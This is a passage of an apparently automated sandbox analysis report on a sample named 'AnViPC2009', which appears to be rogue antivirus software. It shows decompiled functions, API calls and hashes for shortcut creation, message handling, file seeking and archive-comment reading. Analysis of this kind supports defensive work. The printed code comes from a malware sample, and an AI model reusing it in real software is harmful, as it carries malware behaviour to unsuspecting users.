                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateDirectory$ErrorLastVersion
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 4238167203-3595611156
                                                                                                                                                  • Opcode ID: 81501833817551d86af71a76ea8df1cfaf166db4fb332051c75c92c51d561e9b
                                                                                                                                                  • Instruction ID: f49a4586712382b23957ae74ee0495d634437e3f0d7f7fffeaa51e4b3b56a346
                                                                                                                                                  • Opcode Fuzzy Hash: 81501833817551d86af71a76ea8df1cfaf166db4fb332051c75c92c51d561e9b
                                                                                                                                                  • Instruction Fuzzy Hash: AFF0A4321019056AEB257A229C09BAB3A18DF00740F14C537FE02F51E0D77CC871DA9D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                  			E0040A996(intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				short _v532;
                                                                                                                                                  				char _v1556;
                                                                                                                                                  				char* _t34;
                                                                                                                                                  				intOrPtr* _t36;
                                                                                                                                                  				intOrPtr* _t38;
                                                                                                                                                  				intOrPtr* _t44;
                                                                                                                                                  				intOrPtr* _t46;
                                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                                  				intOrPtr* _t52;
                                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                                  				intOrPtr* _t58;
                                                                                                                                                  				int _t60;
                                                                                                                                                  
                                                                                                                                                  				_t60 = 0;
                                                                                                                                                  				__imp__OleInitialize(0);
                                                                                                                                                  				_t34 =  &_v8;
                                                                                                                                                  				__imp__CoCreateInstance(0x4128f8, 0, 1, 0x412848, _t34); // executed
                                                                                                                                                  				if(_t34 >= 0) {
                                                                                                                                                  					_t36 = _v8;
                                                                                                                                                  					 *((intOrPtr*)( *_t36 + 0x50))(_t36, _a4);
                                                                                                                                                  					_t38 = _v8;
                                                                                                                                                  					 *((intOrPtr*)( *_t38 + 0x1c))(_t38, _a12);
                                                                                                                                                  					if(_a16 != 0) {
                                                                                                                                                  						_t58 = _v8;
                                                                                                                                                  						 *((intOrPtr*)( *_t58 + 0x44))(_t58, _a16, 0);
                                                                                                                                                  					}
                                                                                                                                                  					if(_a20 != _t60) {
                                                                                                                                                  						_t56 = _v8;
                                                                                                                                                  						 *((intOrPtr*)( *_t56 + 0x2c))(_t56, _a20);
                                                                                                                                                  					}
                                                                                                                                                  					E0040A450( &_v1556, _a4);
                                                                                                                                                  					E004076F9( &_v1556);
                                                                                                                                                  					if(_v1556 != _t60) {
                                                                                                                                                  						_t54 = _v8;
                                                                                                                                                  						 *((intOrPtr*)( *_t54 + 0x24))(_t54,  &_v1556);
                                                                                                                                                  					}
                                                                                                                                                  					_t44 = _v8;
                                                                                                                                                  					_push( &_v12);
                                                                                                                                                  					_push(0x4128e8);
                                                                                                                                                  					_push(_t44);
                                                                                                                                                  					if( *((intOrPtr*)( *_t44))() >= 0) {
                                                                                                                                                  						MultiByteToWideChar(_t60, _t60, _a8, 0xffffffff,  &_v532, 0x104);
                                                                                                                                                  						_t50 = _v12;
                                                                                                                                                  						_push(1);
                                                                                                                                                  						_push( &_v532);
                                                                                                                                                  						_push(_t50); // executed
                                                                                                                                                  						if( *((intOrPtr*)( *_t50 + 0x18))() >= 0) {
                                                                                                                                                  							_t60 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						_t52 = _v12;
                                                                                                                                                  						 *((intOrPtr*)( *_t52 + 8))(_t52);
                                                                                                                                                  					}
                                                                                                                                                  					_t46 = _v8;
                                                                                                                                                  					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                  				}
                                                                                                                                                  				__imp__OleUninitialize();
                                                                                                                                                  				return _t60;
                                                                                                                                                  			}


















                                                                                                                                                  0x0040a9a0
                                                                                                                                                  0x0040a9a3
                                                                                                                                                  0x0040a9a9
                                                                                                                                                  0x0040a9ba
                                                                                                                                                  0x0040a9c2
                                                                                                                                                  0x0040a9c8
                                                                                                                                                  0x0040a9d1
                                                                                                                                                  0x0040a9d4
                                                                                                                                                  0x0040a9dd
                                                                                                                                                  0x0040a9e3
                                                                                                                                                  0x0040a9e5
                                                                                                                                                  0x0040a9ef
                                                                                                                                                  0x0040a9ef
                                                                                                                                                  0x0040a9f5
                                                                                                                                                  0x0040a9f7
                                                                                                                                                  0x0040aa00
                                                                                                                                                  0x0040aa00
                                                                                                                                                  0x0040aa0d
                                                                                                                                                  0x0040aa19
                                                                                                                                                  0x0040aa24
                                                                                                                                                  0x0040aa26
                                                                                                                                                  0x0040aa33
                                                                                                                                                  0x0040aa33
                                                                                                                                                  0x0040aa36
                                                                                                                                                  0x0040aa3e
                                                                                                                                                  0x0040aa3f
                                                                                                                                                  0x0040aa44
                                                                                                                                                  0x0040aa49
                                                                                                                                                  0x0040aa5e
                                                                                                                                                  0x0040aa64
                                                                                                                                                  0x0040aa69
                                                                                                                                                  0x0040aa71
                                                                                                                                                  0x0040aa72
                                                                                                                                                  0x0040aa78
                                                                                                                                                  0x0040aa7a
                                                                                                                                                  0x0040aa7a
                                                                                                                                                  0x0040aa7c
                                                                                                                                                  0x0040aa82
                                                                                                                                                  0x0040aa82
                                                                                                                                                  0x0040aa85
                                                                                                                                                  0x0040aa8b
                                                                                                                                                  0x0040aa8b
                                                                                                                                                  0x0040aa8e
                                                                                                                                                  0x0040aa98

                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040A9A3
                                                                                                                                                  • CoCreateInstance.OLE32(004128F8,00000000,00000001,00412848,?), ref: 0040A9BA
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040AA5E
                                                                                                                                                  • OleUninitialize.OLE32 ref: 0040AA8E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2968213145-0
                                                                                                                                                  • Opcode ID: fb9c586c9fb5440b83fb889942a5213d7322b8fbc96e1bda4fd449a9188eb5a3
                                                                                                                                                  • Instruction ID: 3edc598eddc15014abc051cdaf2913f0e6c1832dde95bd65b695a039898fa7dd
                                                                                                                                                  • Opcode Fuzzy Hash: fb9c586c9fb5440b83fb889942a5213d7322b8fbc96e1bda4fd449a9188eb5a3
                                                                                                                                                  • Instruction Fuzzy Hash: 9731F875A00209AFDF00DFA0C988E9A7779EF88304F1445A9B505EB291C775DEA1DF64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040A806() {
                                                                                                                                                  				struct tagMSG _v32;
                                                                                                                                                  				int _t6;
                                                                                                                                                  				long _t12;
                                                                                                                                                  
                                                                                                                                                  				_t6 = PeekMessageA( &_v32, 0, 0, 0, 0); // executed
                                                                                                                                                  				if(_t6 != 0) {
                                                                                                                                                  					GetMessageA( &_v32, 0, 0, 0);
                                                                                                                                                  					TranslateMessage( &_v32);
                                                                                                                                                  					_t12 = DispatchMessageA( &_v32); // executed
                                                                                                                                                  					return _t12;
                                                                                                                                                  				}
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}






                                                                                                                                                  0x0040a817
                                                                                                                                                  0x0040a81f
                                                                                                                                                  0x0040a828
                                                                                                                                                  0x0040a832
                                                                                                                                                  0x0040a83c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040a83c
                                                                                                                                                  0x0040a844

                                                                                                                                                  APIs
                                                                                                                                                  • PeekMessageA.USER32(0040A7D3,00000000,00000000,00000000,00000000), ref: 0040A817
                                                                                                                                                  • GetMessageA.USER32 ref: 0040A828
                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0040A832
                                                                                                                                                  • DispatchMessageA.USER32 ref: 0040A83C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                                  • Opcode ID: 6f758e3524847f8367fe4475849f677d5cd065856652c1f6fd865f23679596fb
                                                                                                                                                  • Instruction ID: d2dbb09323ad63b434658416e01ed091b2a32e89b97b261240c84389225ddb4f
                                                                                                                                                  • Opcode Fuzzy Hash: 6f758e3524847f8367fe4475849f677d5cd065856652c1f6fd865f23679596fb
                                                                                                                                                  • Instruction Fuzzy Hash: BBE0ED72C0216AA7CB106BE5DD0CDDF7FACEE052517008061B505E2025E678D515C7F4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                  			E00405318(void* __ecx, long _a4, long _a8, signed int _a12) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				long _t19;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  				long _t28;
                                                                                                                                                  				long _t31;
                                                                                                                                                  
                                                                                                                                                  				_t22 = __ecx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t25 = __ecx;
                                                                                                                                                  				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
                                                                                                                                                  					L12:
                                                                                                                                                  					_t15 = 1;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t28 = _a8;
                                                                                                                                                  					_t31 = _t28;
                                                                                                                                                  					if(_t31 <= 0 && (_t31 < 0 || _a4 < 0) && _a12 != 0) {
                                                                                                                                                  						if(_a12 != 1) {
                                                                                                                                                  							_t21 = E00405511(_t22, _t23, __eflags);
                                                                                                                                                  						} else {
                                                                                                                                                  							_t21 = E00404FA3(_t22, _t23);
                                                                                                                                                  						}
                                                                                                                                                  						_a4 = _a4 + _t21;
                                                                                                                                                  						asm("adc esi, edx");
                                                                                                                                                  						_a12 = _a12 & 0x00000000;
                                                                                                                                                  					}
                                                                                                                                                  					_v8 = _t28;
                                                                                                                                                  					_t19 = SetFilePointer( *(_t25 + 4), _a4,  &_v8, _a12); // executed
                                                                                                                                                  					if(_t19 != 0xffffffff || GetLastError() == 0) {
                                                                                                                                                  						goto L12;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t15 = 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t15;
                                                                                                                                                  			}











                                                                                                                                                  0x00405318
                                                                                                                                                  0x0040531b
                                                                                                                                                  0x0040531d
                                                                                                                                                  0x00405323
                                                                                                                                                  0x00405385
                                                                                                                                                  0x00405385
                                                                                                                                                  0x00405325
                                                                                                                                                  0x00405326
                                                                                                                                                  0x00405329
                                                                                                                                                  0x0040532b
                                                                                                                                                  0x0040533f
                                                                                                                                                  0x00405348
                                                                                                                                                  0x00405341
                                                                                                                                                  0x00405341
                                                                                                                                                  0x00405341
                                                                                                                                                  0x0040534d
                                                                                                                                                  0x00405350
                                                                                                                                                  0x00405352
                                                                                                                                                  0x00405352
                                                                                                                                                  0x00405365
                                                                                                                                                  0x0040536b
                                                                                                                                                  0x00405375
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405381
                                                                                                                                                  0x00405381
                                                                                                                                                  0x00405381
                                                                                                                                                  0x00405375
                                                                                                                                                  0x00405389

                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(?,000000FF,?,?,?,00000000,?,?,004054C8,?,?,?,?,004093F5,000000FF), ref: 0040536B
                                                                                                                                                  • GetLastError.KERNEL32(004054C8,?,?,?,?,004093F5,000000FF,?,00000000,00000000,?,00000000,00000001,00000000,00000000,?), ref: 00405377
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 2976181284-3595611156
                                                                                                                                                  • Opcode ID: 1df87da965669094af9f9845c50d8cd1b0aa35af952414ae821a42156fa9e51f
                                                                                                                                                  • Instruction ID: 45d997bd5926ea14948b1ac93e807db85fb2d556c696fc190fe1d5546c33b5cf
                                                                                                                                                  • Opcode Fuzzy Hash: 1df87da965669094af9f9845c50d8cd1b0aa35af952414ae821a42156fa9e51f
                                                                                                                                                  • Instruction Fuzzy Hash: 3A018871400B15EBCF249E5488096AB7B68EB003A4F14823AAC20A22D0D3B89951DE99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004116EF(struct HINSTANCE__** __ecx) {
                                                                                                                                                  				struct HINSTANCE__* _t3;
                                                                                                                                                  				intOrPtr* _t4;
                                                                                                                                                  				struct HINSTANCE__** _t11;
                                                                                                                                                  				struct HINSTANCE__* _t12;
                                                                                                                                                  
                                                                                                                                                  				_t11 = __ecx;
                                                                                                                                                  				_t3 =  *__ecx;
                                                                                                                                                  				if(_t3 != 0) {
                                                                                                                                                  					FreeLibrary(_t3); // executed
                                                                                                                                                  				}
                                                                                                                                                  				_t12 =  *(_t11 + 4);
                                                                                                                                                  				if(_t12 != 0) {
                                                                                                                                                  					FreeLibrary(_t12);
                                                                                                                                                  				}
                                                                                                                                                  				_t4 =  *0x41fff0; // 0x76f5c100
                                                                                                                                                  				return  *((intOrPtr*)( *_t4 + 8))(_t4);
                                                                                                                                                  			}







                                                                                                                                                  0x004116f0
                                                                                                                                                  0x004116f2
                                                                                                                                                  0x004116fd
                                                                                                                                                  0x00411700
                                                                                                                                                  0x00411700
                                                                                                                                                  0x00411702
                                                                                                                                                  0x00411707
                                                                                                                                                  0x0041170a
                                                                                                                                                  0x0041170a
                                                                                                                                                  0x0041170c
                                                                                                                                                  0x00411719

                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,0040D4FA), ref: 00411700
                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,0040D4FA), ref: 0041170A
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\Desktop\Endermanch@AnViPC2009.exe, xrefs: 004116EF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                  • String ID: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                  • API String ID: 3664257935-27879111
                                                                                                                                                  • Opcode ID: aa0f0d0a31222e1c633dfd25cdcebbfd44fcc52f42a65a2f3c19f7151812dd85
                                                                                                                                                  • Instruction ID: 083892d07a101c2cf0ff630c68f4d3d0e534bf94cff5b240c246acdf1fa32695
                                                                                                                                                  • Opcode Fuzzy Hash: aa0f0d0a31222e1c633dfd25cdcebbfd44fcc52f42a65a2f3c19f7151812dd85
                                                                                                                                                  • Instruction Fuzzy Hash: DEE012366012209BC620AB59ED449CBF3ECBF86721316446BE944E3360C7A4EC428AA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E0040AA9B(void* __ecx, intOrPtr _a4, int _a8) {
                                                                                                                                                  				struct _ITEMIDLIST* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				intOrPtr* _t12;
                                                                                                                                                  
                                                                                                                                                  				__imp__SHGetMalloc( &_v12, __ecx, __ecx);
                                                                                                                                                  				SHGetSpecialFolderLocation(0, _a8,  &_v8); // executed
                                                                                                                                                  				__imp__SHGetPathFromIDListA(_v8, _a4); // executed
                                                                                                                                                  				_t12 = _v12;
                                                                                                                                                  				return  *((intOrPtr*)( *_t12 + 0x14))(_t12, _v8);
                                                                                                                                                  			}






                                                                                                                                                  0x0040aaa4
                                                                                                                                                  0x0040aab3
                                                                                                                                                  0x0040aabf
                                                                                                                                                  0x0040aac5
                                                                                                                                                  0x0040aad2

                                                                                                                                                  APIs
                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 0040AAA4
                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 0040AAB3
                                                                                                                                                  • SHGetPathFromIDListA.SHELL32(?,?), ref: 0040AABF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FolderFromListLocationMallocPathSpecial
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 628029987-0
                                                                                                                                                  • Opcode ID: df2556eee234547602640ddb04af988f2cdaa077e0eefedec4b74921080d4395
                                                                                                                                                  • Instruction ID: f71e1e9fe61c152cb1e5697b4ac27f55d3cba9fbd9229f8b989aedb73968518a
                                                                                                                                                  • Opcode Fuzzy Hash: df2556eee234547602640ddb04af988f2cdaa077e0eefedec4b74921080d4395
                                                                                                                                                  • Instruction Fuzzy Hash: DAE0CA7A900109FFDF05DFE0DE09DDEBB79EB08205F1080A0FA06D6120D6B1AA24AB24
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                  			E00401887(void* __ecx, void* __edx, void* __edi, CHAR** _a4, long _a8) {
                                                                                                                                                  				char _v28;
                                                                                                                                                  				long _t27;
                                                                                                                                                  				signed int _t29;
                                                                                                                                                  				long _t30;
                                                                                                                                                  				signed int _t35;
                                                                                                                                                  				signed int _t48;
                                                                                                                                                  				long _t50;
                                                                                                                                                  				long _t67;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				CHAR** _t70;
                                                                                                                                                  
                                                                                                                                                  				_t69 = __ecx;
                                                                                                                                                  				if( *((char*)(__ecx + 0x6d8b)) != 0) {
                                                                                                                                                  					E0040A7C2( &_v28, __edx, __ecx);
                                                                                                                                                  					__eflags =  *(_t69 + 0x4694) & 0x00000002;
                                                                                                                                                  					_push(0);
                                                                                                                                                  					_push(0);
                                                                                                                                                  					if(( *(_t69 + 0x4694) & 0x00000002) == 0) {
                                                                                                                                                  						_push(( *(_t69 + 0x4696) & 0x0000ffff) +  *((intOrPtr*)(_t69 + 0x6d94)) + 7);
                                                                                                                                                  						E004054B4(_t69);
                                                                                                                                                  						_t27 = E0040274C(_t69, __edx, __eflags, "CMT");
                                                                                                                                                  						__eflags = _t27;
                                                                                                                                                  						if(_t27 == 0) {
                                                                                                                                                  							L11:
                                                                                                                                                  							_t48 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							L12:
                                                                                                                                                  							E0040A7E9( &_v28);
                                                                                                                                                  							_t29 = _t48;
                                                                                                                                                  							L13:
                                                                                                                                                  							return _t29;
                                                                                                                                                  						}
                                                                                                                                                  						_t30 = E004016DE(_t69, _a4, _a8); // executed
                                                                                                                                                  						__eflags = _t30;
                                                                                                                                                  						if(_t30 == 0) {
                                                                                                                                                  							goto L11;
                                                                                                                                                  						}
                                                                                                                                                  						_t48 = 1;
                                                                                                                                                  						goto L12;
                                                                                                                                                  					}
                                                                                                                                                  					_push( *((intOrPtr*)(_t69 + 0x6d94)) + 0x14);
                                                                                                                                                  					E004054B4(_t69);
                                                                                                                                                  					E00401CA1(_t69, __edx, __eflags);
                                                                                                                                                  					_t70 = _a4;
                                                                                                                                                  					_t50 = _t70[1];
                                                                                                                                                  					__eflags = _t50;
                                                                                                                                                  					if(_t50 > 0) {
                                                                                                                                                  						OemToCharBuffA( *_t70,  *_t70, _t50);
                                                                                                                                                  						_t67 = _a8;
                                                                                                                                                  						__eflags = _t67;
                                                                                                                                                  						if(_t67 != 0) {
                                                                                                                                                  							E0040167B(_t67, _t50 + 1);
                                                                                                                                                  							E00401660(_t70, 0);
                                                                                                                                                  							E0040E218( *_t70,  *_t67, _t50 + 1);
                                                                                                                                                  							E004016C4(_t70, _t50);
                                                                                                                                                  							E0040167B(_t67, E0040E3F5( *_t67));
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t35 = E0040A7E9( &_v28);
                                                                                                                                                  					__eflags = _t70[1];
                                                                                                                                                  					_t29 = _t35 & 0xffffff00 | _t70[1] > 0x00000000;
                                                                                                                                                  					goto L13;
                                                                                                                                                  				}
                                                                                                                                                  				return 0;
                                                                                                                                                  			}













                                                                                                                                                  0x0040188e
                                                                                                                                                  0x00401897
                                                                                                                                                  0x004018a5
                                                                                                                                                  0x004018aa
                                                                                                                                                  0x004018b1
                                                                                                                                                  0x004018b3
                                                                                                                                                  0x004018b5
                                                                                                                                                  0x0040194c
                                                                                                                                                  0x0040194f
                                                                                                                                                  0x0040195b
                                                                                                                                                  0x00401960
                                                                                                                                                  0x00401962
                                                                                                                                                  0x00401979
                                                                                                                                                  0x00401979
                                                                                                                                                  0x00401979
                                                                                                                                                  0x0040197b
                                                                                                                                                  0x0040197e
                                                                                                                                                  0x00401983
                                                                                                                                                  0x00401985
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401985
                                                                                                                                                  0x0040196c
                                                                                                                                                  0x00401971
                                                                                                                                                  0x00401973
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401975
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401975
                                                                                                                                                  0x004018c4
                                                                                                                                                  0x004018c7
                                                                                                                                                  0x004018ce
                                                                                                                                                  0x004018d3
                                                                                                                                                  0x004018d6
                                                                                                                                                  0x004018d9
                                                                                                                                                  0x004018db
                                                                                                                                                  0x004018e3
                                                                                                                                                  0x004018e9
                                                                                                                                                  0x004018ec
                                                                                                                                                  0x004018ee
                                                                                                                                                  0x004018f6
                                                                                                                                                  0x004018ff
                                                                                                                                                  0x0040190c
                                                                                                                                                  0x00401914
                                                                                                                                                  0x00401923
                                                                                                                                                  0x00401923
                                                                                                                                                  0x00401928
                                                                                                                                                  0x0040192f
                                                                                                                                                  0x00401934
                                                                                                                                                  0x00401936
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401936
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffChar
                                                                                                                                                  • String ID: CMT
                                                                                                                                                  • API String ID: 1973267554-2756464174
                                                                                                                                                  • Opcode ID: 683bb94dbd11273eb1dd50c52b5243f55e481dcf058bb089e32f5a211393342f
                                                                                                                                                  • Instruction ID: 351763eee22837c5a62972fcfadf7bcbf7ec653a156bc51b235eb532ec158812
                                                                                                                                                  • Opcode Fuzzy Hash: 683bb94dbd11273eb1dd50c52b5243f55e481dcf058bb089e32f5a211393342f
                                                                                                                                                  • Instruction Fuzzy Hash: C92184716006146BDB15AA22C852AAEB7AD9F44708F04442FB8467B2E2DA399D12C7A9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                  			E00404EF5(void* __ecx) {
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				int _t22;
                                                                                                                                                  				signed int _t23;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  
                                                                                                                                                  				_t30 = __ecx;
                                                                                                                                                  				_t24 = 1;
                                                                                                                                                  				if( *(__ecx + 0xc) == 0) {
                                                                                                                                                  					_t18 =  *(__ecx + 4);
                                                                                                                                                  					if(_t18 == 0xffffffff) {
                                                                                                                                                  						L14:
                                                                                                                                                  						 *((intOrPtr*)(_t30 + 0xc1c)) =  *((intOrPtr*)(_t30 + 0xc1c)) + 1;
                                                                                                                                                  						return _t24;
                                                                                                                                                  					}
                                                                                                                                                  					if( *((char*)(__ecx + 0x10)) != 0) {
                                                                                                                                                  						L11:
